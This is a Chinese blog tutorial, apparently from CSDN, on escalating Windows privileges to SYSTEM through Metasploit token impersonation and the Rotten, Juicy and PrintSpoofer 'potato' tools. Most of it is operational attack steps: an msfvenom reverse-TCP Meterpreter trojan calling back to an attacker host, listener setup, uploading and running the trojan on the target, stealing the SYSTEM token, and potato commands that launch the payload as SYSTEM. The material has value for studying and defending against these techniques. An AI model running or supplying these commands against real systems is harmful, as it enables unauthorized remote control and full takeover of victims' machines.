MSF+烂土豆家族窃取访问令牌提权

已于 2023-11-19 12:44:26 修改
阅读量422 收藏 1
点赞数 9
分类专栏: # 内网渗透-提权 文章标签: 网络安全
于 2023-11-17 17:43:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65554829/article/details/134467427
版权

MSF提权

管理员权限——>system

条件:有以下两个权限,一般为管理员组成员(在蚁剑的终端用 whoami /priv 查看)

        SelmpersonatePrivilege(模拟客户端权限)

        SeAssignPrimaryTokenPrivilege / SelncreaseQuotaPrivilege(替换进程级访问令牌权限)

步骤:

#在kali生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.150.129 lport=8888 -f exe -o payload.exe
#将木马上传到目标服务器并执行

#在msf开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.150.129
set lport 8888 
run
#在蚁剑查看当前用户及其权限
whoami
net user xue
whoami /priv
#MSF#加载 incognito 模块 
load incognito
#列出主机上的所有访问令牌
list_tokens -u 
#窃取 NT AUTHORITY\SYSTEM 账户的令牌
impersonate_token "NT AUTHORITY\SYSTEM"

#从指定的进程窃取令牌
steal_token PID

#退回之前的令牌

rev2self

#查看当前权限
getuid

Rotten Potato提权

普通用户——>system

条件:有SelmpersonatePrivilege(模拟客户端权限)

#在kali生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.150.129 lport=8888 -f exe -o payload.exe
#将木马上传到目标服务器并执行

#在msf开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.150.129
set lport 8888 
run

#向目标主机上传rottenpotato.exe

#执行rottenpotato.exe
execute -Hc -f rottenpotato.exe
#列出主机上的所有访问令牌
list_tokens -u 
#窃取 NT AUTHORITY\SYSTEM 账户的令牌
impersonate_token "NT AUTHORITY\SYSTEM"

Juicy Potato提权

普通用户——>system

条件:有SelmpersonatePrivilege(模拟客户端权限)

#将JuicyPotato.exe和MSF生成的payload.exe上传到目标服务器
#在https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md上查找要加载的COM对象的CLSID
#在msf开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.150.129
set lport 8888 
run
#在AntSword上执行提权命令
JuicyPotato.exe -t t -p payload.exe -l 8888 -n 135 -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}

注释:

# -t,指定要使用CreateProcesswithTokenW和CreateProcessAsUserA()中的哪个函数
# -p,指定要运行的程序
# -l,指定COM对象加载的端口
# -n,指定本地RPC服务端口,默认为135
# -c,指定要加载的COM对象的CLSID
根据操作系统版本选择一个可用的COM对象。在Rotten Potato中使用的 COM 对象为BITS,而Juicy Potato为不同 Windows 版本提供了多个可以利用的COM对象

        以上提权方法仅适用于 Windows 10 version 1809 Windows Server 2019 之前版本的系统。 在之后的版本中,微软通过检查RPC绑定字符串中指定的端口来修复了这个问题,修复后的系统无法通 过原来的方法实现中间人攻击。

Pipe Potato提权

普通用户——>system

条件:有SelmpersonatePrivilege(模拟客户端权限)

#将PrintSpoofer64.exe和MSF生成的payload.exe上传到目标服务器
#在msf上设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.150.129
set lport 8888 
run
#在蚁剑上提权
PrintSpoofer64.exe -i -c payload.exe

注释:

#原理:PrintSpoofer64.exe -i -c [命令]
以system的权限执行命令,利用了打印机组件路径检查中存在的一个Bug

妈妈说名字很长会有傻子跟着念
关注
  • 9
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
窃取AccessToken的方法:incognito.exe程序
07-28
它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。 假冒令牌可以假冒一个网络中的另...
Windows提权土豆
2401_84275261的博客
04-18 552
我们今天利用土豆来对windows进行提权;靶机:windows-2003我们先用kali的msf工具生成一个木马。msf启动命令:msfconsole,或者直接输入命令来生成木马这里先启动msf然后我们生成木马最后通过通过中国菜刀将我们生成的木马放入目标网站启动msf的监听状态设置参数。接下来用最常规的方法提权,发现提权失败我们需要查找可以利用的漏洞,今天以“土豆”为例作为演示设置对应的参数,并开始攻击结果还是不能成功拿到权限,我们可以用伪造token值(在身份认证中,token是令牌(临时)的意思,
Windows土豆提权复现(MS16-075)
oiadkt的博客
03-08 2056
Windows土豆提权复现(MS16-075)
windows本地提权--令牌窃取&土豆&UAC
金灰的博客
04-23 368
免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等...本地--->system。
提权 - Windows 令牌窃取/进程注入提权
acepanhuan的博客
03-01 515
提权 - Windows 令牌窃取/进程注入提权
小白白红队初成长(7)win权限提升
划水的小白白
05-07 6020
1、前言 1.1、一些补充 2、Potato家族 2.1、补充 2.2、利用前提(条件) 2.3、简述JuicyPotato原理 2.4、利用过程 3、系统错误配置提权-AlwaysInstallElevated 3.1、漏洞原理 3.2、验证目标机器是否存在漏洞 3.3、搭建漏洞环境(激活AlwaysInstallElevated) 3.3.1、第一种方法 3.3.2、第二种方法 3.4、提权测试 4、令牌窃取 什么是令牌? “令牌窃取”使用场景 知识点补充 实际测试 其他补充 5、内核提权 5.1、寻找
[内网渗透]—令牌窃取
Sentiment的博客
12-27 2255
令牌(Token)是指系统中的临时秘钥,相当于账户和密码,有了令牌就可以在不知道密码的情况下访问目标相关资源了,这些令牌将持续存在于系统中,除非系统重新启动。
Windows令牌窃取提权土豆提权学习
Goodric的博客
07-24 1681
令牌,又叫token,是系统临时产生的秘钥,相当于账号密码,用来决定是否允许此次请求和判断此次请求是属于哪一个用户。令牌无需提供密码或其他凭证,就可以访问网络和系统资源,这些令牌持续于系统中,除非系统重新启动。令牌的最大特点就是随机性,不可预测,无法猜解。当不同的用户登录计算机后,都会生成一个访问令牌,这个Token在用户创建进程或线程时还会被使用,并不断进行拷贝,一般用户双击运行⼀个进程都会拷贝explorer.exe中的AccessToken令牌的分类。...
土豆配合令牌窃取提权复现
m0_65096687的博客
05-13 165
土豆配合令牌窃取提权是用来解决普通令牌窃取提权因为webshell权限太低无法提权成功。1.先用msf生成一个windows的后门监听上线。4.使用msf自带的令牌窃取功能。环境:内网kali和win10。3.利用msf上传土豆。先查看一下未提权的权限。2.在网上下载土豆
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
PrintSpoofer:Windows 10和Server 2019上的滥用模拟特权
03-19
打印喷水器 通过在Windows 10和Server 2016/2019上滥用SeImpersonatePrivilege从本地/网络服务到系统。 有关更多信息: : 。 用法 您可以使用-h选项查看帮助消息。 C:\TOOLS>PrintSpoofer.exe -h PrintSpoofer v0.1 (by @itm4n) Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser() Arguments: -c <CMD> Execute th
记一次绕过火绒安全提权实战案例1
08-03
绕过火绒安全提权实战案例1 绕过火绒安全提权实战案例1是指在 Windows 2008 R2 服务器上,绕过火绒安全软件的限制,获取服务器权限的实战案例。该案例中,服务器上安装了多种安全防护软件,包括火绒、护卫神、安全...
70-70.渗透测试-kali更新msf.mp4
最新发布
05-10
70-70.渗透测试-kali更新msf.mp4
权限提升-Windows权限提升篇&溢出漏洞&土豆家族&通杀全系&补丁对比&EXP筛选
siu~
03-23 1202
1、Web到Win-系统提权-土豆家族 2、Web到Win-系统提权-人工操作
土豆提权(MS16-075)--令牌窃取提权
bring_coco的博客
05-28 3870
漏洞介绍 当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。 若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。此更新通过更正 Windows 服务器消息块 (SMB) 服务器处理凭据转发请求的方式来修复此漏洞。 注:土豆(Rotten Potato)提权是一个本地提权,是针对本地用户的,不能用于域用户
windows提权之at&sc&ps&进程注入&令牌窃取
m0_62207170的博客
03-20 745
windows提权之at&sc&ps&进程注入&令牌窃取
Windows 权限提升:SeImpersonatePrivilege
qq_44005305的博客
08-11 167
谈到SeImpersonatePrivilege(身份验证后模拟客户端),它是在Windows 2000 SP4中引入的。被分配此权限的用户是设备本地管理员组的成员和设备的本地服务帐户。除了这些用户和组之外,以下组件也具有此用户权限: 由服务控制管理器组件对象模型(COM) 服务器启动的服务由 COM 基础结构启动并配置为在特定帐户下运行现在我们知道哪些类型的用户拥有此特权,是时候了解用户使用这些特权获得什么了。每当为用户分配 SeImpersontatePrivilege。
土豆搭配令牌窃取提权&dll劫持搭配令牌窃取提权&不带引号服务路径问题提权&不安全的服务权限配置提权
weixin_46626159的博客
03-21 957
土豆搭配令牌窃取提权&dll劫持搭配令牌窃取提权&不带引号服务路径问题提权&不安全的服务权限配置提权
msf提权linux
03-30
Metasploit Framework(简称MSF)是一款广泛使用的渗透测试工具,它提供了丰富的模块和功能,其中包括了一些用于在Linux系统上进行提权的模块。提权是指通过漏洞或者其他手段获取更高权限的过程。 在Metasploit Framework中,有一些常用的模块可以用于Linux系统的提权,例如: 1. exploit/linux/local/udev_netlink 这个模块利用了udev中的漏洞,通过发送特制的netlink消息来提权。 2. exploit/linux/local/overlayfs_priv_esc 这个模块利用了Linux内核中overlayfs文件系统的漏洞,通过创建特殊的文件来提权。 3. exploit/linux/local/sudo_pwfeedback 这个模块利用了sudo命令中的漏洞,通过修改sudo配置文件来提权。 这些只是Metasploit Framework中一小部分可用于Linux系统提权的模块,具体使用方法可以参考Metasploit Framework的官方文档或者相关教程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值